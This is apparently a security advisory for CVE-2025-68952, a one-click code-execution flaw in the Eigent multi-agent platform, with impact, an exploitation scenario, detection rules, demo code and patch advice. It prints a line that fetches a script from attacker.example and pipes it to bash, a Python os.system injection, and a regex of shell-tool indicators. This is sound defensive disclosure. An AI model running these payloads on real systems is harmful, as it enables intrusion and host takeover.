A multi-agent automation framework with direct execution paths to the host environment
Vulnerability Overview
| Field | Details |
|---|---|
| CVE ID | CVE-2025-68952 |
| Vulnerability Name | Eigent One-Click Remote Code Execution (RCE) |
| Vendor / Project | Eigent |
| Affected Product | Eigent (Multi-Agent Workforce Platform) |
| Affected Versions | Version 0.0.60 |
| Fixed Version | 0.0.61 |
| Severity | CRITICAL |
| CVSS Score | 9.1 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H |
| CWE Classification | CWE-94: Improper Control of Code Generation |
| Exploitability | Network-based · Low complexity · Requires authenticated user · One-click user interaction |
| Exploit Availability | No public PoC at time of disclosure |
| Patch Status | Patched in version 0.0.61 |
Vulnerability Description
Eigent is a multi-agent workforce platform designed to automate tasks across distributed environments. In version 0.0.60, a one-click Remote Code Execution (RCE) vulnerability was identified that allows arbitrary code execution on the client system or server running Eigent.
The issue is triggered through a single user interaction, such as clicking a crafted task, agent action, or workflow element. Once triggered, attacker-controlled input is executed directly by the underlying runtime without sufficient validation or sandboxing.
This flaw effectively allows a malicious actor to cross the boundary between workflow logic and the host operating system, resulting in full command execution with the privileges of the Eigent process.
Impact
If successfully exploited, this vulnerability could allow an attacker to:
- Execute arbitrary system commands
- Install malware or persistence mechanisms
- Access sensitive files, credentials, or secrets
- Modify or destroy system data
- Pivot to other systems within the same environment
Because the attack requires only one click, it significantly lowers the barrier to exploitation, especially in collaborative or shared workflow environments.
How This Vulnerability Could Be Exploited
A realistic exploitation scenario may look like this:
- An attacker creates or modifies a workflow, agent task, or shared action containing malicious payloads.
- The payload is embedded in a way that appears legitimate (e.g., task description, automation step, agent instruction).
- A victim user clicks or executes the item once.
- The platform processes the payload and executes it directly on the host.
- The attacker gains remote code execution.
Example Payload (Illustrative)
; curl http://attacker.example/payload.sh | bash
Or in environments using interpreted execution:
__import__("os").system("id")
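Why both payload shapes run, and what neutralises each, as an added example (not Eigent's code, which this page does not show). The handler names are hypothetical, and harmless stand-ins (`echo INJECTED`, `os.getpid()`) replace the payloads above.

```python
import ast
import subprocess

# Hypothetical step handlers: the page does not show Eigent's code. They model
# the two payload shapes with harmless stand-ins (echo, os.getpid).

def run_step_unsafe(filename):
    # Input is pasted into a shell command line, so ';' starts a new command.
    proc = subprocess.run(f"echo processing {filename}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout.splitlines()

def run_step_safe(filename):
    # Argument vector with no shell: metacharacters stay inside one argument.
    proc = subprocess.run(["echo", "processing", filename],
                          capture_output=True, text=True)
    return proc.stdout.splitlines()

def eval_param_unsafe(expr):
    # eval() runs any expression, including __import__(...) calls.
    return eval(expr)

def eval_param_safe(expr):
    # literal_eval accepts only literals (numbers, strings, lists, dicts, ...).
    try:
        return ("ok", ast.literal_eval(expr))
    except (ValueError, SyntaxError):
        return ("rejected", None)

SHELL_INPUT = "report.txt; echo INJECTED"   # constructed, benign
EXPR_INPUT = '__import__("os").getpid()'    # constructed, benign

if __name__ == "__main__":
    print(run_step_unsafe(SHELL_INPUT))   # second command runs
    print(run_step_safe(SHELL_INPUT))     # input stays a single argument
    print(type(eval_param_unsafe(EXPR_INPUT)).__name__)
    print(eval_param_safe(EXPR_INPUT))
    print(eval_param_safe("[1, 2, 3]"))
```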
MITRE ATT&CK Mapping
| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application |
| Execution | T1059 | Command and Scripting Interpreter |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation |
| Persistence | T1547 | Boot or Logon Autostart Execution |
| Credential Access | T1552 | Unsecured Credentials |
| Lateral Movement | T1021 | Remote Services |
Proof of Concept (PoC) Status
Current Status: No public proof-of-concept code is available.
- The vulnerability has not yet been observed in the wild.
- No exploit code has been published publicly.
- Due to the low complexity and one-click nature, exploitation is considered highly feasible.
- Organizations should assume PoCs may surface quickly.
Detection and Monitoring Guidance
What to Monitor
Security teams should watch for:
- Unexpected command execution initiated by Eigent processes
- Outbound network connections immediately following workflow interactions
- Unusual child processes spawned by Eigent
- Workflow executions that trigger system-level activity
- Sudden file changes or permission modifications on the host
Example Detection Payloads
Suspicious Command Indicators
curl|wget|bash -c|powershell -enc|nc -e|os\.system|subprocess
Sample Detection Rules
Endpoint Detection (Generic)
IF process_parent = "eigent"
AND child_process IN ("bash","sh","cmd.exe","powershell")
THEN alert severity = Critical
SIEM / Log-Based Rule
IF workflow_execution
AND system_command_executed = true
AND user_action = single_click
THEN alert severity = High
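The endpoint rule and the indicator pattern above, combined and run over process-creation events, as an added example (not vendor or project code). The parent process name `eigent`, the event fields, the word boundaries in the pattern, the "High" tier for non-shell children and every sample event are assumptions constructed for illustration.

```python
import re

# Pattern from "Suspicious Command Indicators"; the \b anchors are an added
# assumption so short tokens such as "nc -e" do not match inside longer words.
INDICATORS = re.compile(
    r"\b(curl|wget|bash -c|powershell -enc|nc -e|os\.system|subprocess)\b",
    re.IGNORECASE)
SHELLS = {"bash", "sh", "cmd", "powershell"}   # compared after stripping ".exe"
PARENT_NAME = "eigent"                          # assumed process name

def proc_name(path):
    """Lower-cased executable name without directory or .exe suffix."""
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def classify(parent, image, cmdline):
    """Return (severity, indicator hits) or None when the event is not of interest."""
    if proc_name(parent) != PARENT_NAME:
        return None                             # rule is scoped to Eigent children
    hits = sorted({h.lower() for h in INDICATORS.findall(cmdline)})
    if proc_name(image) in SHELLS:
        return ("Critical", hits)               # endpoint rule: Eigent spawned a shell
    if hits:
        return ("High", hits)                   # assumption: indicator, non-shell child
    return None

# Constructed events: (parent image, child image, child command line)
EVENTS = [
    ("/opt/eigent/eigent", "/bin/bash",
     'bash -c "curl http://attacker.example/payload.sh | bash"'),
    ("/opt/eigent/eigent", "/usr/bin/python3",
     "python3 -c \"import os; os.system('id')\""),
    ("/opt/eigent/eigent", "/usr/bin/git", "git status"),
    ("/usr/sbin/sshd", "/bin/bash", 'bash -c "curl https://example.org/health"'),
    (r"C:\Program Files\Eigent\Eigent.exe", r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c whoami"),
]

def scan(events):
    """Return (severity, hits, cmdline) for every event that raises an alert."""
    alerts = []
    for parent, image, cmdline in events:
        verdict = classify(parent, image, cmdline)
        if verdict:
            alerts.append((verdict[0], verdict[1], cmdline))
    return alerts

if __name__ == "__main__":
    for alert in scan(EVENTS):
        print(alert)
```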
Relevant Log Sources
To effectively detect exploitation attempts, collect:
- Eigent application logs (workflow execution and agent activity)
- System process logs (process creation, command execution)
- Endpoint Detection & Response (EDR) telemetry
- Authentication logs (user interaction events)
- Network egress logs for unexpected outbound traffic
- File integrity monitoring logs
Remediation and Mitigation
Official Patch (Recommended)
- Upgrade immediately to Eigent version 0.0.61
- This release fixes the unsafe execution path and prevents untrusted input from being executed on the host.
Official Patch / Release Link:
https://github.com/eigent-ai/eigent/releases/tag/v0.0.61
Temporary Mitigations (If Upgrade Is Delayed)
- Restrict workflow creation and execution to trusted users only
- Disable or isolate high-risk automation features
- Run Eigent in a restricted container or sandbox
- Apply strict OS-level permissions to limit process impact
- Monitor closely for abnormal execution behavior
Final Takeaway
CVE-2025-68952 is a critical one-click Remote Code Execution vulnerability in Eigent that allows arbitrary code execution with minimal user interaction. While exploitation requires a click, the impact is severe and can result in full system compromise.
Organizations running Eigent must upgrade to version 0.0.61 immediately. In shared or collaborative environments, this vulnerability represents a serious risk that should be addressed without delay.
